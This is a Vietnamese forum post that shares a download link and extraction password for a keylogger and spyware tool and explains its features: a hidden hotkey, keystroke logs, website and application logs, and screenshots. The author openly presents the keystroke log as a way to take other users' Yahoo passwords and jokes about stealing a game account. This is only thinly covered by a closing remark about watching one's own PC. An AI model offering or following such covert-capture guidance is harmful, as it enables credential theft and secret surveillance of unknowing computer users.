http://http://www.mediafire.com/?x4p9k3z2int

những hình ảnh khi sử dụng hình ảnh khi sử dụng:













cách sử dụng : bạn nhìn vào mấy cái biểu tượng bên tay trái là biết công dụng của nó rồi chứ
1 .cái đầu tiên có tên là setting đó là phần cài đặt như là pass để vào chương trình của mình , phím tắt để mở chương trình khi đang chạy (như hình)
2 . cái thứ 2 là keystrokes log bạn ấn vào nó thì nó zẽ hiện lên cái bảng mà các người sử dụng khác đã sử dụng bàn phím để đánh nhập vào máy như là pass yahoo (để lấy pass ấy nhe phần nầy là wan trọng thứ nhất đó)
3 . cái thứ 3 làWebsites log đây là phần bạn lick vào để xem nhưng trang web mà người khác đã mở (ko wan trọng lắm )
4 . cái thứ 4 là Applications đây là phần mà bạn lick vào thì xem được nhưng đường dẫn mà người khác đã vào trong máy tính của bạn như c:/......... hay d:/....... (cũng không quan trọng lắm)
5 . cái thứ 5 là screenshots log đây là phần khá wan trọng vì đây là một cái cammera quây lại những hình ảnh chụp trên màng hình khi người sử dụng làm như là hình ảnh của games võ lâm cấp mấy để mình ăn cấp con đó hihihihi cho nó cao ấy mà phần nầy khi bạn bấm vào thì sẽ có một khung ảnh riêng và được trình diến theo các chế độ (hình ở phía dưới)




thế là bạn có thể sử dụng để theo dỏi máy tính của mình khi không có ở nhà
chú ý :1. pass giải nén là www.vn-zoom.com như chữ kí (cái tên file rar cũng có )
2. cách sử dụng mà mình giới thiệu là do mình sử dũng và viết lại nên ko hết nhưng tính năng của nó nên các bạn cũng tự mò lấy nhe
3 . nhớ là khi sử dụng thì phải nhớ phím mở của mình cài hoặc không cài thì mặt định là Ctrl + Alt + F7
4. còn tín năng từ xa thì mình chưa biết nên các bạn tự mò lấy trong setting đấy
5 đây là bài của nguyentrungtin067 nên khi các bạn poss bài vào diễn đàn khác thì cũng ghi rõ tác giả :


nguyentrungtin067 (www.vn-zoom.com)

chúc thành công nến có thắc mắc gì thì PM với mình wa nick nguyentrungtin067